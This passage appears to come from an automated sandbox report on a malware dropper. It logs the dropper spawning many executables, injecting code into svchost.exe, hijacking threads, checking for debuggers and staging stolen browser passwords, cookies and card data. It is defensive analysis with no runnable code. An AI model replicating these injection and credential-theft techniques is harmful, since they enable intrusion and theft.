      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: 4_2_004123F1 SetUnhandledExceptionFilter,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_0046E567 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: 5_2_00467018 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_0040BE40 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00414E70 _memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeCode function: 7_2_00408430 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Allocates memory in foreign processes
      Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DA295A0000 protect: page execute and read and write
      Injects a PE file into a foreign processes
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeMemory written: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe base: 400000 value starts with: 4D5A
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Windows\System32\svchost.exeThread register set: target process: 1380
      Sets debug register (to hijack the execution of another thread)
      Source: C:\Windows\System32\svchost.exeThread register set: 1380 4C000
      Writes to foreign memory regions
      Source: C:\Windows\SysWOW64\rundll32.exeMemory written: C:\Windows\System32\svchost.exe base: 1DA295A0000
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe 'C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe 'C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe 'C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe 'C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe 'C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe 'C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe 'C:\Users\user\Documents\oO2a8x5RXTHKygCXkT7syx3J.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe 'C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe 'C:\Users\user\Documents\LPBuRcBvc7urPUzoi5RqTFtn.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe 'C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe 'C:\Users\user\Documents\BqbASL8ovE3o_gRiKrvwENXN.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe 'C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe 'C:\Users\user\Documents\KyTQCmNmjazMZrvIWzjrSsQG.exe'
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeProcess created: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe 'C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exe'
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeProcess created: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe
      Source: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exeProcess created: C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe 'C:\Users\user\Documents\MQ5u6_H0cs9EUXsesfNpGUNc.exe'
      Source: C:\Users\user\Documents\Xl5_fidIgZFRU48uwkdfjZGj.exeProcess created: C:\Windows\SysWOW64\rundll32.exe 'C:\Windows\system32\rUNdlL32.eXe' 'C:\Users\user\AppData\Local\Temp\axhub.dll',axhub
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\file4.exe 'C:\Program Files (x86)\Company\NewProduct\file4.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jooyu.exe 'C:\Program Files (x86)\Company\NewProduct\jooyu.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\jingzhang.exe 'C:\Program Files (x86)\Company\NewProduct\jingzhang.exe'
      Source: C:\Users\user\Documents\M5uLwz0sXvZcR89u_43Nm9v8.exeProcess created: C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe 'C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe 'C:\Program Files (x86)\Browzar\NVdpapR9v21C.exe'
      Source: C:\Users\user\Documents\5hIw8OebGuR7XztS5WBp_Scm.exeProcess created: C:\Program Files (x86)\Browzar\Browzar.exe 'C:\Program Files (x86)\Browzar\Browzar.exe'
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Users\user\Documents\gDoWsyv4ZlqhjBKjyfkjR1BY.exeProcess created: unknown unknown
      Source: C:\Program Files (x86)\Company\NewProduct\jingzhang.exeProcess created: unknown unknown
      Source: C:\Windows\System32\svchost.exeProcess created: unknown unknown
      Source: explorer.exe, 00000027.00000000.747615085.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progman
      Source: ZteJ0k9a2sM9jXcC3SndaipD.exe, 00000005.00000002.984738795.0000000001170000.00000002.00000001.sdmp, awTgWtFfNpBsevxQFHzT446w.exe, 00000008.00000002.1020647055.0000000001370000.00000002.00000001.sdmp, ulVElw2mPS2j3QKCM9gOxM3j.exe, 00000009.00000002.987955817.0000000001110000.00000002.00000001.sdmp, oO2a8x5RXTHKygCXkT7syx3J.exe, 0000000B.00000002.1024980068.0000000001020000.00000002.00000001.sdmp, gUlDp5No64Xfcgfbo3IlvG0y.exe, 0000000C.00000002.1014550702.0000000001B70000.00000002.00000001.sdmp, BqbASL8ovE3o_gRiKrvwENXN.exe, 00000010.00000000.771808608.0000000000CB0000.00000002.00000001.sdmp, 5hIw8OebGuR7XztS5WBp_Scm.exe, 00000012.00000002.976370374.0000000000C90000.00000002.00000001.sdmp, gDoWsyv4ZlqhjBKjyfkjR1BY.exe, 00000014.00000002.978512057.0000000001140000.00000002.00000001.sdmp, YX7wpjoMI0vZoMwVbFh9XNIC.exe, 00000015.00000002.966060615.0000000001700000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000021.00000002.1002329372.0000000000DC0000.00000002.00000001.sdmp, md8_8eus.exe, 00000023.00000002.1015614071.0000000000F70000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000024.00000002.1017930027.0000000000D00000.00000002.00000001.sdmp, explorer.exe, 00000027.00000000.762676166.0000000001080000.00000002.00000001.sdmp, jfiag3g_gg.exe, 00000029.00000002.1015524889.0000000000EE0000.00000002.00000001.sdmpBinary or memory string: Progmanlock
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: GetLocaleInfoW,
      Source: C:\Users\user\Desktop\yevbZfdCqR.exeCode function: EnumSystemLocalesW,
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeCode function: GetLocaleInfoA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: __EH_prolog3,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,_memset,LocalFree,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\9PWySv_SmMZ5POEp2PUJ_lbI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Autofill\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\CC\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Cookies\Edge_Cookies.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Cookies\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Cookies\IE_Cookies.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Downloads\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\Files\Default.zip VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\History\Google Chrome_Default.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\information.txt VolumeInformation
      Source: C:\Users\user\Documents\ZteJ0k9a2sM9jXcC3SndaipD.exeQueries volume information: C:\ProgramData\OJH9USLOWAIUGU4EU97CUU6N0\files\passwords.txt VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeQueries volume information: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exe VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Users\user\Documents\awTgWtFfNpBsevxQFHzT446w.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
      Source: C:\Users\user\Documents\ulVElw2mPS2j3QKCM9gOxM3j.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeQueries volume information: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exe VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
      Source: C:\Users\user\Documents\gUlDp5No64Xfcgfbo3IlvG0y.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exe VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
      Source: C:\Users\user\Documents\YX7wpjoMI0vZoMwVbFh9XNIC.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
